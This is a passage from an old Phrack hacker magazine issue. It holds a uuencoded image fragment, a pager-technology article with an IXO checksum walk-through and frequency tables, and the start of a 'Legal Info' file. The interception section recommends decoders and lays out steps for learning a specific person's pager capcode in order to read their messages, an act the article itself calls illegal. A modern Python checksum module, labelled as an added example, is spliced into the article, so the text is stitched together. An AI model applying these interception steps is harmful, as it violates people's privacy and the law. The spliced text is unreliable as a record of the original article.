M_\'Y[/_!_<'_P?W!\#!\'_!\&?!_\'^8,'PP?C!7 M_\'@<,'@?,'XP>#!YGA____?_\'YP?_!\<'_P?S!\<'PQ/_!\\'_P?'G_\+Y] MP?'._\__P?AQP?O"\'_!^'_!_\'^8<'P><'_P>#!\&Q\P?C!\'9\?___W__!/ 
M^,'_P>#!_GQAP>#!_\+SP?_!\<'\8,+\P?C!]_3_VO_!^,+_P?'!^'_"_\'X+ M?___X?_!^<'_D'X_0\'`P?_"X<'G`,'^`,',?#@']/_B_\'^/___X_^>'A_"( MG\'_P'X^?P?^#P>'!QSY_P<\./CN_N M]/______R/^?'@_"C\'_A\'C1SY_P<^.'AO!W_3______\;_P?G!_Y^8'?G_!SXP<.`_T_______&_\'YP?^_N`?!_\'AP?^`P>`'?G_!Y\',L M`#`O]/______QO_!^<'_P?[!\`/#_X#!XH9^?\'GP)X?\'GP?C!X'#U_______&_\'YP?^`<<'CP?_!I MP<'_.&/!QA#!_\'/P'`\'_P<^.P<<8% M#_3______\C_C\/_C\)_/\'/!\'_P=^/P<\\#_3______]'_C\7_#_3_____: M_\;_P?W__\;______\;_P?G__\;______\;_P?G__\;______\;_P?G__\;_` M_____\;_P?G__\;_________S?_X_\'O_____]/_^/_![______3_______&G M_\']___&_______&_\'Y___&_______&_\'Y___&_______&_\'Y___&____U M___&_\'Y___&_________\W_________S?_________-_______&_\']___&Y M_______&_\'Y___&_______&_\'Y___&_______&_\'Y___&_______&_\'YQ M___&_________\W_________S?_________-_________\W______\;_P?G_I M_\;______\;_P?G__\;______\;_P?G__\;______\;_P?G__\;______\;_W MP?O__\;_________S?_________-_______&_\']___&_______&_\'Y___&> M_______&_\'Y___&_______&_\'Y___&_______&_\'Y___&_______&_\'[S M___&_________\W_________S?_________-_______&_\'Y___&_______&V M_\'Y___&_______&_\'Y___&_______&_\'Y___&_______&_\'[___&____S M_____\W_________S?_________-_______&_\'Y___&_______&_\'Y___&U M_______&_\'Y___&_______&_\'Y___&_______&_\'[___&_________\W_B M________S?_________-_______&_\'Y___&_______&_\'Y___&_______&' M_\'Y___&_______&_\'Y___&_______&_\'[___&_________\W_________; MS?______QO_!^?__QO______QO_!^?__QO______QO_!^?__QO______QO_!K M^?__QO______QO_!^?__QO______QO_!^___QO_________-_________\W_R M_____\;_P?G__\;______\;_P?G__\;______\;_P?'__\;______\;_P?G_W M_\;______\;_P?G__\;______\;_P?O__\;_________S?_________-____= M___&_\'[___&_______&_\'Y___&_\[_P?W___;_P?'__\;_SO_'<,+P<,7PV MP?G!_,+Y___D_\'Y___&_\[_0,X`0&#"<,'QP?G!_\'[___@_\'Y___&_\__Q MPM_#G\'?'@\?Q`[(`@`"!@(&`L(&PPX/PA\/'@\?P?^?O___S/_!^___QO_:\ M_Y_!_Y^/#Q_$#\(.PP8$!@0&!`8$Q0;##L,/'P\?G\'_O______+_^3_G[^?_ MPX_'#\0'P@8'Q0;"!P\'Q@_"C\*?_____\'_]/^?PX^.#L,$Q``$PP#$!`X$1 
M!P^_C\'/]/_!^___QO_^_\']PO'!X<'@PF`@`,,@PP`@P@!@(,)@P>#!X<'PA MP?'!^>O_P?G__\;____#_\'YP?''\,+@PV!`PF#"0,1@Q?#!^<'XP?G!_>+_0 MP?G__\;____1_\'[P?_!^,3P<,'PQW#%8'!@PG!@<,3PP?C!^,/[P?_!^\?_P?G__\;_! M___H_\/?GQ["!L,"`,("P@`"`,("PP8.#Q\.'\'?'Y/!WY_!_\.?P=_^____W M\?_"G\!PQ/#!\<[______^;_P?W!^<'_Q/C%\,-PR&!PSO______\__"^\'YP?C#L M\'!@PD#._______]_\'?SO_________-_________\W_________S?______S M___-_________\W_________S?_________-_\__P=]_______O_SO_!_L(&& M#W______^?_._\'^P@8'?______Y_\[_P?S"_\'^?______Y_\[_P?S"_\'\A M______K_SO_!_,+_P?S_____^O_._\'\PO_!_/_____Z_\[_P?S"_\'^?___' M___Y_]'_P?Y_______G_T?_!_G______^?_2_W______^?_._\']PO_!_G_#@ M_Q^`/Y_$_\'//\'_O______J_\[_P?W"_\'\PO_!^,'_/P`_O\'GP?_!^,'_. MP>`GP?`AP?_!_L'AP?_!\______E_\[_P?S"_\'\PO_!^,)\('Z_P>/!_\'XV MP?_!P$'!\`'!_\'X`,'^P<#!_\'OPOC!_\'QPO_!^<+_P>#!_\'PP?/!\/__` M___5_\[_P?S"_\'\PO_!_,)\>'Y_P?/!_\'P?\'@8<'P<<'_P?!PP?Q@?V_!& M^'A_P>'!_G_!\,'_P?Y@?\'P<,'P?______4_\[_P?W"_\'^PO_!_#Q\?\''I M'\'CP?_!\'_!Q\'PP?'"_\'@P?C">!\'P?AX?\'AP?P/P?#!_YX`!\'@`,'`F M`\'_P?G_____TO_1_\'^?\+_#'S!_\'''\'GP?_!\A^/P?C!\\+_P>/!_CC!5 M_P\'P?@\'X'!_@_!\#_"'X?!PY_!PY#!_\'YR/_!_G_*_\'/___\_]'_P?Y_V MPO\,P?S!_\'''\'GP?_!XQ^/P?W!Q\+_P>?!_SS!_P\'P?@\'X/!_@_!\,,?Y MPL?!_\''P?Q_P?W(_\'^?\K_P<_(_\'?___S_]+_?\+_A\+_P>

?!_\'G= M#X>#P<>?P?_!Q\'_P??!_X<'P>`^#X/!_@?!\,(/'\'GP%_C M#\'_P>^_P?_!S\'_P?Y_RO_!Q\C_P<^?P?\____P_\[_P?W"_\'^?\+_@\']M MP?_!YQ_!Y\'_P>!\'X'!_(?!\`_"'\'Q) MP>?!_\''P?P_P>!^!\'_P>0_O\''P?^>?\K_P'!^,'_P>,?P>/!_\'CC\'``\'P`<'_P>?!_\'QP?_!XP'!X'@/C M@<'XP>'!\,''GS_!\<'AP?/!X\'\?\'PP?@AP?_!X#\!@'P`POG!\#_!X,'_G MP?PCP?#!_\'PP,0P>!XP<8!P?#!X<'PP>/!R MWG_!\,'@8\'CP?Q_PO#!X<'_P>#!W@$@?$#"\<'P?\'`P?_!^`'!X&?!\$/!P M_\'@P?_!X<'XP?G!]\W_P?'!^]'_P?Y_QO_!\<;_P?S"_\'[___"_\[_P?C"$ M_\'\P__!X\'XP?_!\W_!\\'_P>`/P>#!\<'PPO_!Y\'_P?'!_\'C,,'@>,'@$ M<<3P/G_!\,'@8<'CP?Q_P?C!\<'XP?_!X\'N/'XX<,+QP?#!YG!_P?AQP>!AM MP>`#P?_!X'Y@P?!P8'/!_C_!_\'\P?'!^'?!\,'_P?#!_\'SP?'!_\'XT/_!M M_L?_P?'&_\'X?\'_P?'!\___P?_._\'YPO_!_L/_P>/!^,'_P>,?P>/!_\'`& M#\''PO/"_\'GP?_!\<'_P<,0P/\'QP>`#P?QC!^,+QP>/!SCQ_P?C!\<'@0<'`!\'_`!X`<,(``\'.4 M#\'_>`'!^`?!P'_!P,'_0\'@P?O!\'_!^<;_P=_/_\'CP?_"S\/_P?A_P?_!V M\\'GQ/_!Q\7_P??U_]'_P?Y_PO_!Q\'^/\'''\''P?^&!X_!^\'SPO_!Q\'^A M,\'_AQP.>$(1P<`!PO#"'\'YP'"XX_!Q\'_#XX>,'!!P<./#\'_'@#!\`>"#P8^`\'`P?/!1 MP`\`/\'^`\'"#X(?P?\'P?X/P?X?P__!W\'_P=_#_\''P?_!SX_#_\'XPO_!& M\\''Q/_!W\7_P>?U_]'_P?Y_PO_!Q\'^'X\/P?"_\''P?XYP MP?^/'`XX0`'!P`'!\\'\#Q_!^\''P?_!Q\'^/\'YP>?!_<'_PL\>/PW!_G_!( M^8_!_@\?P?^!P/!YX\/P?\>#&/"A\(/'@_!P\'G! MAP\&/\'^`\'`#X`/P?\'P?X/P_!_\'/W?_/_\,/?\+_P`CP<<.P?/!_@\?PL?!_\''P?X_P?_!Y\+_P<_!QQX_R MC\'^>\'_C\'_!A_!_@/!Q\'CC\''P?\/A@X[P>/"YX\/P?\>?F.?CX!\'^!L'_P>X/A\'_!X8?A\'_P>`_< M!\'CPL<_PO_!SX_!_X_"_X?,_P_(_\''P?_!S]W_SO_!_``$`,/_P.?P/Y MCCP`P?P`P?_!X`>!P?\'@!\!P?_!X#P'P>'!Q\'`/\'\P?^/@'\'P?_!_`?"9 M_\''P_^/O\3_#\C_P#!X/!_\'@P?_!B MX#_!_W_!\<'OP?#!X"'!_\'X`,'\`#_"/'C!\,'QP>/!_,'PP?P?``/!X,'_S MP>'!\,'_P?G"\<'_P>?!QSQ_*<'XPO'!Y\'\?\'_P?#!\<'CP>&?P>/!_[_!! 
MP"#!^/"/\'_P>#"YS^?P?C!_,'AL MP?#!X\'AP>>./,)XP?#!_\/AP?_!PX$/.,'_P?!P8<'QP>/!P"S!^'G!QX!\P M`,'_P?`!P>`_@'S!_,'P``/!^"_!X'P'P>#"_\'GQ/_!X\7_P>/$_\'YP?_!# M^<'QT?_/_\'YPO'%_\'PP?_!\,/_P?/!_\+P8<'_P?@`P?P`?WY\>,'PP?'!P MY\'\P?#!_#X``\'@<<+@P?_"\,'QP?_!X\'&/'XXP?C"\<'GP>1_P?_!\,'Q8 MP>/!X<'?P/"/\'\= MP>#!Y\'B?\'_P?C!_\'CP?#!Y\'QP>?!_GS!^,'PP?C!_\'CP>'!Y\'_PL?!7 MW'Q_P_#!\<'CP`>'#!_\'@0<'`'X!XP?S!\``!P?`'P'$_\'PP?_"\='_X/_"^<'_P?[!\<'_) MP?#"_\'^P_G!_\'\P?'"_\'P?\'P8,'@8<'_P?AX8<'_P>!^?W!\<,+PP>#!! MYGQ_PO#!X\'QP??!X\+_P>Q\P?G#\<'_?\'_>,'XP?_!\<'GP?)XP?C!_\+QW MP?_!XWX_P?A@P>?!X'_!_\'XP?_!X\'XP>?!\<'B?GC!^'#!_,'_P>?!\<'G5 MP?_![\'_P?QX?\'XP?'!^,'PP>/!_\'B<''!Y\'^>,'XP?_"X<'PP>;">,'\Y MPO#!\<'PP>'!X#PG8'_!_&#!\'_!^&'!X'_!_\'@P?AAP>#!^'_!_\+PP?_!? M\,'XP?_!_,__YO_!^\3_P?O#_\'[PO_!\'_!X`'!X$/!_\'X>`?!_\'`PC\`( M?$!X0<'@#SA_P?#!X,'CP>'!PX/!_P\,?'G!\<'AP?/!SS_!_SC!^'_!\<''? MP>,_P?C!_\+QP=_!X\(_P?@@P(^>,'\<<'\V MP?_!Q\'QP>?!_\'/C\',`'_!^,'SP?C!\<'#/\'"<''!QSXXP?C!_\'#P>,?) MP<9_>,'\PO#!\<+A@8\/"#_!^'#!\'_!^$/!X`/!SX!X`<'`P?`?P?_!P,'@- M?\'@>`/!^'_.__O_'\'_P<=_P?_!Q\'_!GX'P?H?@G_!_`!'P>/!P`_!_P`?( M`'O!^\'CP?./'\'_'GQCP?.'CQ\'%'!P\'CE M#\'_!C!_P>!X`\'P#\[__?^/PO_!S\'_#\'_#\'_'X=_P?X/P<_![\'`#\'_E M`!\!?\'_PN>/#\'_'GQC!X?"#QX_P>?!XX^'PA_!_,'PA\''PA_!_']'P?_!! 
MS\'GP>`^''P_P?[!_X_!Y\'/P?^/#XX/?\'YP>?!_,'CP<?!_\+'CQX=?\+'C\'_G M#CW!_\'YP?@#P<8/SO_]_\'/TO\//X_#_\'WPH_!_S_!_WX'A@^&'P?![\'WM MP<?C_!_L'_A\'GP<_!_\./'\+_P>?!2 M_\'CP<?!_\''P?>/P@_!_\+'O\'_GC_#_\'GP<>'SO_]_X_2_X_'_X_!_S_!_\'\Q M!X`?@#\#P?C!]\'@'S\?P?P`!\''AA_!_!S!\8/!QX?!^'X\P?P\P?S!_X?!= MY\'/P?_!SX^./\'_P?G!Y\'\P>'!QQ^/P@>'/SS!_,'_P<_!YQ_!QG_"_,'SF MP?W!\8`'PH\/P<`_P?G!_C?!_\'GP?S!Q\'SC@01P?_!Y\'P/\'_P?P]P?_"8 M^<'QPL?.____T?^_S?_!Q<'_P?W!_\'[P?W!_\'XP__!_##![\'GP>`_P?\`# MP?`#P>`'P?C!_GC!_'A@P?_!X,'CP>?!_\'GC\',.'_!^<+PP?'!X\*/@P?!O MQS\XP?C!_\'#P>&?P>9_P?C!_,'QP?C!\<'CP?^/AS_!^#_!\<'\<<'_P>'!T M^,'CP?'!Q`!QP?_!X\'P+\'_P>!YP?_!^<'QP?#!X,'CSO___]__P/!_\'>,,'_) MP?'!\,'AP?'!X\'`/\'#A\''P?YXP?#!_\+CG\'&?GC!^,'QP?#!\<'CP?'!= MW\''PO]_P?'!^''!_\'QP?#!X\'QP<1PP?'!_\'CP?A'P?\`><'_PO'!\,'`S M`\[____T_\'@P?_!^,'_P?W!_L'\<,'_P?A_PO_!\\+_P>#!_\'YP?AAP?'!0 M\\'P?\'WP?_!Y\'^?'#!_\'P8\'@/G!X<,+PP_'!_\'GP?]_P?_"^'G!_\'Q5 MP?#!\\'QP>1_P?#!^<'SP?_!X\'\<'G!_\'YP?'!^,'@P?/.____W__!S]3_\ MP>?!_\'YQ/_!\,'_P?S#_\'SPO_!X<+_P?X#P?O!_\'P?\'_P=_!S\'_?`#!O M_\'@`\'`'X!\`,/QP>#!PY^'P@\?POAYP?_!\<'PP>/!\\'.?W#!^<'CP?_!' MX\'^?'G!_\'YP?'!^<'#S_____3_P?!Y@_!_P8??\'_?\'_P<<'SO____O_#]7_P?P#U_^_P?^_C\'G> MP?^/P?_!_!_!_P<!\>&/!\'[!X<+_P?!OPO#!_L/_P?C#A M_\'XP?_!\,W_P?["?,/_P?'!_\'WPO_!^<7_P?[!]\7_P?[_____SO\#'#AAW MP<`<`,+_P>`'`'!X`\+_P/![\'_P?S"_\'\?____O_._P\>.$.&R M'AK"_\'"#P80?`/"_X(>`<'^`'_!\#[!\@(/P<)_P?\#P?(/P?X?P<9_P?X?/ MP?^?P?^7P?^/PO_!^\7_P?[!Y\'?P?_!_L+_P?Y____^_\[_#XX_AP^>/G_!1 M_\*/'AQ]P?O"_X\.#'P,?\'\/&`"!XX?P?X,P>`#P<(/AAX\#C\'P?P'P?^&U M'X?!_\'^#\*_P?_!_<'GP?_!S\'\?\'_GC_+_\'/RO_!Y___Y__._P^//X''CX./@?!. 
M]@?!_X8/A\'_P?X/GQ]_P?_!YX^'P?X_P?^.?X_!_Y_(_X_*_\'GQO\____@% M_\[_#XX\`1_!_`!_P?\/P<^`&,'@`<+_P?X,?''!_'_"_,'SP>/!YQ^?P?X_O MP?'!\,+''Y["/L(\8\''P?_"APP\P?`'CAY_P?'!YX\`,#_!_@!^`<'\!\'/1 MP>^`!'^/P?^_C\C_P?S%_\'SPO\____@_\[_O\',>`&_P?@`PO^/P>_!X#C!_ MX`#"_\'@/,'X<<'XP?_!\,'XP?'!X<'B'Y_!_#_!\<'PP,'X[ MPN'!_\'!P>8X>,+AP&/`'!_P?@`?`#!\`/!Y\'C@"!_`<'P/X/!C M\,+_P>'$_\'XQ?_!\<+_/___X/_/_\'$<,'QO\'XP?'"_\'?P>8`>,'PP?'"@ M_\'`.,'X<<'XP?_"\,+SP>(`'\'^`,'QP?#!P$)_P?["?'#!\&/!\<'_P/!\<',','_P?'!X<'./'#!_\'XP?!XPG#!\,'#P>/!P`!\8,'P1\'!V MP>!_P?Q`P?A_P?[!P,'P8<'SP?!_P>'!\,'X___B_\__P>QPP?'!_\'XP?O#N M_\'N<'C!\,'QPO_!X#C!^''!^,'_PO#"\\'B('_!_F#!\<'PP?!X,)PP>/!\<'L.,'_P?'!X<'L/,'XP?_"^,)X<,'PPN/!\#!X< M<,'PPF/!X'_!_'#!\'_!_&#!\&'!\\'@?F#"\'___^'_SO^#'#'!X8>8?,+_! MP<_!QCPXP?'!^<+_'QQX<<'X?\+XPO/!XQG"_\'PP?'!^,'`?G_!_GY\<`#!5 MP\'SP?_!S\'@`##!P\'QP<08P?_!X<'CP<\!P?C!_\'YP?QPP?YSP?O!Q\'CO MPI\8P?ACP>/"S\'_P?C">'_!_,)X<<'CP<`>$,'@P?!#P/L+_CPX>&,'SP_\?''YQP?Q_POC"\\'G'\+_P?QSP?B/GA_!WCY^.`_!^ MQ\'WP?^/P<8`.,'/P?/!S@S!_\'CP>>/`L'XP?_!^<'^><'^`\'_P<_!Q\(?; M&,'\9\''CP_!_\'\?GA_P?Q^/'W!QX>>'G/!\X>/?___W__._P8_/`&$'@?!$ MY\'_P<8/`!P\!\'/P?\.#'X\"'_"_,/G#Q_!_CXCP?'"SQ\.PCX\P?_!Q\'W( MP?^/P<8?P?S!S\'CP<0-P?_"YX_!Q#S!_\'YP?XYP?X#P?^/P?!M M_\'&#P8>/@?!S\'_!@Y^/@)_PO[#YP\?P?X>`X/"QP\.PS[!_P?!Q\'_CX8?Q MP?_!Q\'CP<6#P?_!Y\''C\'./\+_P?X[P?X'P?^/P.?C___X/_._P_"_[_"_X_!\\+_OX^_?@_!Q\'_= M@`S!_GX`?\'\/,+WP>>`'\'^`,'P`\'@!X0>/GP\','CA\'_AX8>.,''P?!QX_!_!_!^<'^.<'_, MP?S!_SS!_&>`#'_!\\'T#X___^#_SO^_QO_!\\'_P?W%_\'GP?_!X<'MPOP@X MP?_!^'C"\\'WP>!_P?X`P?`!P>`'P<##?'@@P?!#P?^!AC!PP>'!X\+AP?_!\ MX<'CCGPXP?_"^'G!_''!\<''P>._/SC!_\+CP<_!^#_!^<'^><'_P?C!_SC!` M_,'C@#C!_\'QP?@CP<___^#_U?_!\\?_P>?,_\'XPO_!\\'PP?_!\,'_P?#"F M_L+\0<'P8\'_P>!_P>#"\$/!\<'AP?_!\<'CP,'_P?AP>'#"\,'AP,'_P?C!_'C!_,'AP=O!^,'^P?'!_\'CP<__G M_^#_U?_!\]3_P?G#_\'QP?_!_,'_P?C"_\'^P?_!\<'X<\'_P?!_P>#!^,'P$ M?\'QP>'!_\'QP>/!_F!X?\'X<'APP?!AP>#!P\)^>,'XP?/!X\'OP?]_POAX1 MP?_!^,'\>,'XP>/!_\'XP?S!\<'_P?/![___X/_N_\'QU?_!\<+_P<#!_'_!( 
                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 7 of 28

****************************************************************************

                              BIG FUN (cont)

section 2 of uuencode 4.13 of file GAME.PCX    by R.E.M.
ID= PG1
Processing - Please Wait
ACK
[p
123 ABC 17;
ACK
EOT

The checksum data came from:

        STX     000 0010
        1       011 0001
        2       011 0010
        3       011 0011
        CR      000 1101
        A       100 0001
        B       100 0010
        C       100 0011
        CR      000 1101
        ETX     000 0011
               ----------------
             1  0111 1011
               ----------------
             1    7    ;      Get it? Get an ASCII chart and it will all make sense.

Note: Everything in the paging blocks, from STX to ETX inclusive, is used to generate the checksum. Also, this is binary data, guys...you can't just type at the ID= prompt and expect to have it recognized as IXO. It wants specific BITS. Got it? Just checking...

** PAGER FREQUENCIES - US **

[Frequencies transmitting pager information are extremely easy to identify while scanning. They identify each batch transmission with a two-tone signal, followed by bursts of data. People with scanners may tune into some of the following frequencies to familiarize themselves with this distinct audio.]
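The IXO checksum worked out above (add up the 7-bit value of every character from STX to ETX inclusive, then read the total off as three ASCII characters), as an added Python example that is not code from the original article; it also shows the receiving side rejecting a damaged block. The function names, the printable-ASCII restriction on fields and the optional trailing CR are assumptions of this example.

```python
"""IXO/TAP paging block checksum: build and verify.

Added example, not code from the article. The sample values ("123", "ABC",
checksum "17;") are the ones used in the article's walk-through.
"""

STX, ETX, CR = 0x02, 0x03, 0x0D


def bits7(value: int) -> str:
    """Format a character the way the article's table does, e.g. '011 0011'."""
    return f"{(value >> 4) & 0x07:03b} {value & 0x0F:04b}"


def ixo_checksum(block: bytes) -> bytes:
    """Checksum over a block that runs from STX to ETX inclusive."""
    if len(block) < 2 or block[0] != STX or block[-1] != ETX:
        raise ValueError("block must start with STX and end with ETX")
    # Sum the 7-bit value of every character, framing characters included.
    total = sum(b & 0x7F for b in block)
    # Low 12 bits as three 4-bit groups, each added to 0x30 ('0'), so the
    # groups 1, 7 and 0xB come out as '1', '7' and ';' on an ASCII chart.
    return bytes(0x30 + ((total >> shift) & 0x0F) for shift in (8, 4, 0))


def build_frame(fields) -> bytes:
    """STX, CR-terminated fields, ETX, then the three checksum characters."""
    body = bytearray([STX])
    for field in fields:
        data = field.encode("ascii")
        # Assumption of this example: fields are printable ASCII only, so a
        # stray STX/ETX/CR inside a field can never be mistaken for framing.
        if any(b < 0x20 or b > 0x7E for b in data):
            raise ValueError("field contains a non-printable character")
        body += data + bytes([CR])
    body.append(ETX)
    return bytes(body) + ixo_checksum(bytes(body))


def parse_frame(frame: bytes) -> list:
    """Validate a received frame and return its fields; ValueError if damaged."""
    if frame[:1] != bytes([STX]):
        raise ValueError("missing STX")
    etx = frame.find(ETX)
    if etx < 0:
        raise ValueError("missing ETX")
    block, tail = frame[:etx + 1], frame[etx + 1:]
    # Assumption: a CR after the checksum is tolerated but not required.
    if tail.endswith(bytes([CR])):
        tail = tail[:-1]
    if len(tail) != 3:
        raise ValueError("checksum must be exactly three characters")
    expected = ixo_checksum(block)
    if tail != expected:
        raise ValueError(f"checksum mismatch: got {tail!r}, expected {expected!r}")
    payload = block[1:-1]
    if not payload.endswith(bytes([CR])):
        raise ValueError("last field is not CR-terminated")
    return [f.decode("ascii") for f in payload[:-1].split(bytes([CR]))]


def checksum_table(block: bytes) -> list:
    """Per-character rows plus the running total, as in the article's table."""
    rows = [bits7(b & 0x7F) for b in block]
    total = sum(b & 0x7F for b in block)
    rows.append(f"{(total >> 8) & 0x0F:b} {(total >> 4) & 0x0F:04b} {total & 0x0F:04b}")
    return rows


if __name__ == "__main__":
    frame = build_frame(["123", "ABC"])      # pager ID and message from the article
    for row in checksum_table(frame[:-3]):
        print(row)
    print("checksum:", frame[-3:].decode("ascii"))
    print("fields:  ", parse_frame(frame))
```
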
Voice Pager Ranges:     152.01   - 152.21
                        453.025  - 453.125
                        454.025  - 454.65
                        462.75   - 462.925

Other Paging Ranges:    35.02    - 35.68
                        43.20    - 43.68
                        152.51   - 152.84
                        157.77   - 158.07
                        158.49   - 158.64
                        459.025  - 459.625
                        929.0125 - 931.9875

** PAGER FREQUENCIES - WORLD **

Austria         162.050  - 162.075      T,N,A
Australia       148.100  - 166.540      T,N,A
                411.500  - 511.500      T,N,A
Canada          929.025  - 931.975      T,N,A
                138.025  - 173.975      T,N,A
                406.025  - 511.975      T,N,A
China           152.000  - 172.575      N,A
Denmark         469.750                 N,A
Finland         450.225                 T,N,A
                146.275  - 146.325      T,N,A
France          466.025  - 466.075      T,N,A
Germany         465.970  - 466.075      T,N,A
                173.200                 T,N,A
Hong Kong       172.525                 N,A
                280.0875                T,N,A
Indonesia       151.175  - 153.050      A
Ireland         153.000  - 153.825      T,N,A
Italy           466.075                 T,N,A
                161.175                 T,N
Japan           278.1625 - 283.8875     T,N
Korea           146.320  - 173.320      T,N,A
Malaysia        152.175  - 172.525      N,A,V
                931.9375                N,A
Netherlands     156.9865 - 164.350      T,N,A
New Zealand     157.925  - 158.050      T,N,A
Norway          148.050  - 169.850      T,N,A
Singapore       161.450                 N,A
                931.9375                N,A
Sweden          169.8                   T,N,A
Switzerland     149.5                   T,N,A
Taiwan          166.775                 N,A
                280.9375                N,A
Thailand        450.525                 N,A
                172.525  - 173.475      N,A
UK              138.150  - 153.275      T,N,A
                454.675  - 466.075      T,N,A

T = Tone   N = Numeric   A = Alphanumeric   V = Voice

** INTERCEPTION AND THE LAW **

For many years the interception of pages was not considered an invasion of privacy because of the limited information provided by the tone-only pagers in use at the time. In fact, when Congress passed the Electronic Communications Privacy Act in 1986 tone-only pagers were exempt from its provisions.

According to the ECPA, monitoring of all other types of paging signals, including voice, is illegal. But, due to this same law, paging transmissions are considered to have a reasonable expectation of privacy, and Law Enforcement officials must obtain a proper court order to intercept them, or have the consent of the subscriber.

To intercept pages, many LE-types will obtain beepers programmed with the same capcode as their suspect.
To do this, they must contact the paging company and obtain the capcode associated with the person or phone number they are interested in. However, even enlisting the assistance of the paging companies often requires following proper legal procedures (warrants, subpoenas, etc.).

More sophisticated pager-interception devices are sold by a variety of companies. SWS Security sells a device called the "Beeper Buster" for about $4000.00. This particular device is scheduled as a Title III device, so any possession of it by someone outside a law enforcement agency is a federal crime. Greyson Electronics sells a package called PageTracker that uses an ICOM R7100 in conjunction with a personal computer to track and decode pager messages. (Greyson also sells a similar package to decode AMPS cellular messages from forward and reverse channels called "CellScope.")

For the average hacker-type, the most realistic and affordable option is the Universal M-400 decoder. This box is about 400 bucks and will decode POCSAG at 512 and 1200, as well as GOLAY (although I've never seen a paging service using GOLAY.) It also decodes CTCSS, DCS, DTMF, Baudot, ASCII, SITOR A & B, FEC-A, SWED-ARQ, ACARS, and FAX. It takes audio input from any scanner's external speaker jack, and is probably the best decoder available to the Hacker/HAM for the price.

Output from the M400 shows the capcode followed by T, N or A (tone, numeric or alpha) ending with the message sent. Universal suggests hooking the input to the decoder directly to the scanner before any de-emphasis circuitry, to obtain the true signal. (Many scanners alter the audio before output for several reasons that aren't really relevant to this article...they just do. :) )

Obviously, even viewing the pager data as it streams by is of little use to anyone without knowing to whom the pager belongs. Law Enforcement can get a subpoena and obtain the information easily, but anyone else is stuck trying to social engineer the paging company.
One other alternative works quite well when you already know the individual's pager number, and need to obtain the capcode (for whatever reason).

Pager companies will buy large blocks in an exchange for their customers. It is extremely easy to discover the paging company from the phone number that corresponds to the target pager either through the RBOC or by paging someone and asking them who their provider is when they return your call. Once the company is known, the frequencies allocated to that company are registered with the FCC and are public information. Many CD-ROMs are available with the entire FCC Master Frequency Database. (Percon sells one for 99 bucks that covers the whole country - 716-386-6015) Libraries and the FCC itself will also have this information available.

With the frequency set and a decoder running, send a page that will be incredibly easy to discern from the tidal wave of pages spewing forth on the frequency. (6666666666, THIS IS YOUR TEST PAGE, etc...) It will eventually scroll by, and presto! How many important people love to give you their pager number?

** THE FUTURE **

With the advent of new technologies pagers will become even more present in both our businesses and private lives. Notebook computers and PDAs with PCMCIA slots can make use of the new PCMCIA pager cards. Some of these cards have actual screens that allow for use without the computer, but most require a program to pull message data out. These cards also have somewhat large storage capacity, so messages have the option of being fairly large, should the service provider allow them to be.

With the advent of 8-bit alphanumeric services, users with PCMCIA pagers can expect to receive usable computer data such as spreadsheet entries, word processing documents, and of course, GIFs. (Hey, porno entrepreneurs: beeper-porn! Every day, you get a new gif sent to your pagecard! Woo Woo. Sad thing is, it would probably sell.)
A branch of Motorola known as EMBARC (Electronic Mail Broadcast to A Roaming Computer) was one of the first to allow for such broadcasts. EMBARC makes use of a proprietary Motorola protocol, rather than POCSAG, so subscribers must make use of either a Motorola NewsStream pager (with nifty serial cable) or a newer PCMCIA pager. Messages are sent to (and received by) the user through the use of special client software.

The software dials into the EMBARC message switch accessed through AT&T's ACCUNET packet-switched network. The device itself is used for authentication (most likely its capcode or serial number) and some oddball protocol is spoken to communicate with the switch.

Once connected, users have the option of sending a page out, or retrieving pages either too large for the memory of the pager, or from a list of all messages sent in the last 24 hours, in case the subscriber had his pager turned off.

Additionally, the devices can be addressed directly via x.400 addresses. (X.400: The CCITT standard that covers email addresses far too long to be worth sending anyone mail to.) So essentially, any EMBARC customer can be contacted from the Internet.

MTEL, the parent company of the huge paging service SkyTel, is implementing what may be the next generation of paging technologies. This service, NWN, being administrated by MTEL subsidiary Destineer, is most often called 2-way paging, but is more accurately Narrowband-PCS.

The network allows for the "pager" to be a transceiver. When a page arrives, the device receiving the page will automatically send back an acknowledgment of its completed reception. Devices may also send back some kind of "canned response" the user programs. An example might be: "Thanks, I got it!" or "Why on Earth are you eating up my allocated pages for the month with this crap?"

MTEL's service was awarded a Pioneers Preference by the FCC, which gave them access to the narrowband PCS spectrum before the auctions.
This is a big deal, and did not go unnoticed by Microsoft. They dumped cash into the network, and said the devices will be supported by Chicago. (Yeah, along with every other device on the planet, right? Plug and Pray!)

The network will be laid out almost identically to MTEL's existing paging network, using dedicated lines to connect towers in an area to a central satellite up/downlink. One key difference will be the addition of highly somewhat sensitive receivers on the network, to pick up the ACKs and replies of the customer units, which will probably broadcast at about 2 or 3 watts. The most exciting difference will be the speed at which the network transmits data: 24,000 Kbps. Twenty-four thousand. (I couldn't believe it either. Not only can you get your GIFs sent to your pager, but you get them blinding FAST!) The actual units themselves will most likely look like existing alphanumeric pagers with possibly a few more buttons, and of course, PCMCIA units will be available to integrate with computer applications.

Beyond these advancements, other types of services plan on offering paging-like features. CDPD, TDMA & CDMA Digital Cellular and ESMR all plan on providing a "pager-like" option for their customers. The mere fact that you can walk into a K-Mart and buy a pager off a rack would indicate to me that pagers are far too ingrained into our society, and represent a wireless technology that doesn't scare or confuse the yokels. Such a technology doesn't ever really go away.

** BIBLIOGRAPHY **

Kneitel, Tom, "The Secret Life of Beepers," _Popular Communications_, p. 8, July, 1994.

O'Brien, Michael, "Beep! Beep! Beep!," _Sun Expert_, p. 17, March, 1994.

O'Malley, Chris, "Pagers Grow Up," _Mobile Office_, p. 48, August, 1994.

                         ==Phrack Magazine==

              Volume Five, Issue Forty-Six, File 9 of 28

****************************************************************************

                              Legal Info
                          by Szechuan Death

OK.
This document applies only to United States citizens: if you are a citizen of some other fascist country, don't come whining to me when this doesn't work..... :)

Make no mistake: I'm not a lawyer. I've merely paid attention and picked up some facts that might be useful to me along the way. There are three subjects that it pays to have a knowledge of handy: prescription drugs, medical procedures, and legal facts. While these may all be boring as hell, they can certainly pull your ass out of the fire in a pinch.

Standard disclaimer: I make no claims about this document or facts contained therein. I also make no claims about their legal authenticity: if you want to be 100% sure, there's a library in damn near every town, LOOK IT UP!

One more thing: This document is useful for virtually ANYTHING. Its effectiveness stretches far beyond computer hacking (although it's worn a bit thin for serious crimes, as every cretin on Death Row has tried it already.....:)

